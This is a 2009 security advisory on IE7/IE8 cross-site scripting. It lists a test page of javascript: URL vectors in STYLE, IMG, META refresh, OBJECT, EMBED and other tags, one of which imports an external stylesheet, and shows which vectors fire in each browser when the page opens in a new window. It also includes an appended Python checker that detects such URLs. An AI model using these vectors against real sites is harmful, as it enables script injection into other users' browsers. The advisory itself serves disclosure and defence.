
Multiple Exploiting IE8/IE7 XSS Vulnerability

2009-6-22 10:59 | Submitted by: security

Author: www.80vul.com [Email:5up3rh3i#gmail.com]
Release Date: 2009/06/22
References: http://www.80vul.com/ie8/Multiple%20Exploiting%20IE8IE7%20XSS%20Vulnerability.txt

Overview:

In IE7/IE8, tags [not including <IFRAME>] are not allowed to run "javascript:[jscodz]", but we found that they are allowed to run it when the page is opened in a new target. For example, this URL:

    http://www.80vul.com/test/ie8-1.htm

ie8-1.htm's codz:

    <STYLE>@import 'javascript:alert("xss1")';</STYLE>
    <IMG SRC=javascript:alert('XSS2')>
    <BODY BACKGROUND="javascript:alert('XSS3')">
    <LINK REL="stylesheet" HREF="javascript:alert('XSS4');">
    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS5');">
    <IFRAME SRC="javascript:alert('XSS6');"></IFRAME>
    <DIV STYLE="background-image: url(javascript:alert('XSS7'))">
    <STYLE>.XSS{background-image:url("javascript:alert('XSS8')");}</STYLE><A CLASS=XSS></A>
    <STYLE type="text/css">BODY{background:url("javascript:alert('XSS9')")}</STYLE>
    <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS10')></OBJECT>
    <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
    <script SRC="javascript:alert('xss11');"></script>
    <video SRC="javascript:alert('xss12');"</video>
    <LAYER SRC="javascript:alert('xss13')"></LAYER>
    <embed src="javascript:alert('xss14')" type="application/x-shockwave-flash" allowscriptaccess="always" width="0" height="0"></embed>
    <applet src="javascript:alert('xss15')" type=text/html>

When this URL is visited directly with IE7/IE8, <IFRAME SRC="javascript:alert('XSS6');"></IFRAME> runs, but the others do not.

However, this changes when ie8-1.htm is opened in a new target [like <a href= target="_blank">, <iframe>, window.open in <script>, etc.]. I tested this codz on my localhost:

    <a href="http://www.80vul.com/test/ie8-1.htm" target="_blank">go</a>

[PS: <a href="gohttp://www.80vul.com/test/ie8-1.htm">go</a> doesn't work]

and of course this codz:

    <iframe src="http://www.80vul.com/test/ie8s.htm"></iframe>

and this codz:

    <script>window.open("http://www.80vul.com/test/ie8-1.htm");</script>

........[testing].......

So the results are:

---------------------------------------------------------
IE  | alert
---------------------------------------------------------
ie7 | xss4/xss3/xss2/xss1/xss8/xss/xss11/xss7/xss6/xss9
---------------------------------------------------------
ie8 | xss4/xss1/xss11/xss6
---------------------------------------------------------

Disclosure Timeline:

2009/05/01 - Found this vulnerability
2009/06/22 - Public disclosure

Greeting:

ycosxhack [http://hi.baidu.com/ycosxhack], Not his test, not this Vulnerability.
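Because execution of these vectors depends on how the page is opened, a server-side filter should flag every javascript: URL in user-supplied markup, whatever tag carries it. The following is an added example, not part of the original advisory: a checker built on Python's standard html.parser that covers the attribute, META refresh, PARAM and CSS positions used in ie8-1.htm. The names ScriptUrlFinder, find_script_urls and is_script_url are hypothetical.

```python
import re
from html.parser import HTMLParser

URL_ATTRS = {"src", "href", "background"}   # URL attributes used by the page's vectors
_CSS_REF = re.compile(r"""(?:@import\s*(?:url\(\s*)?|url\(\s*)["']?([^"')]+)""", re.I)
_REFRESH = re.compile(r"url\s*=\s*(.+)", re.I | re.S)
# Added example. Sample: lines from the advisory's ie8-1.htm plus one benign line constructed here.
SAMPLE = """<STYLE>@import 'javascript:alert("xss1")';</STYLE>
<IMG SRC=javascript:alert('XSS2')>
<LINK REL="stylesheet" HREF="javascript:alert('XSS4');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS5');">
<DIV STYLE="background-image: url(javascript:alert('XSS7'))">
<a href="https://example.com/">ok</a>"""

def is_script_url(value):
    # Conservative normalisation: drop whitespace/control characters, ignore case.
    return re.sub(r"[\x00-\x20]+", "", value or "").lower().startswith("javascript:")

class ScriptUrlFinder(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings, self._in_style = [], False   # findings: (tag, location) pairs

    def _css(self, tag, where, css):
        if any(is_script_url(m.group(1)) for m in _CSS_REF.finditer(css)):
            self.findings.append((tag, where))

    def handle_starttag(self, tag, attrs):
        attrs = {k: v or "" for k, v in attrs}
        self._in_style = tag == "style"             # text that follows is CSS
        for name, value in attrs.items():
            is_url = name in URL_ATTRS or (tag, name) == ("param", "value")
            if is_url and is_script_url(value):
                self.findings.append((tag, name))
            elif name == "style":                   # inline style attribute
                self._css(tag, "style", value)
        if tag == "meta" and attrs.get("http-equiv", "").lower() == "refresh":
            m = _REFRESH.search(attrs.get("content", ""))
            if m and is_script_url(m.group(1)):
                self.findings.append((tag, "content"))

    def handle_endtag(self, tag):
        self._in_style = False

    def handle_data(self, data):
        if self._in_style:                          # body of a <style> element
            self._css("style", "css", data)

def find_script_urls(html):
    finder = ScriptUrlFinder()
    finder.feed(html)
    finder.close()
    return finder.findings
```

For filtering rather than detection, allowing only an explicit list of schemes such as http and https is stricter than matching javascript: alone.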
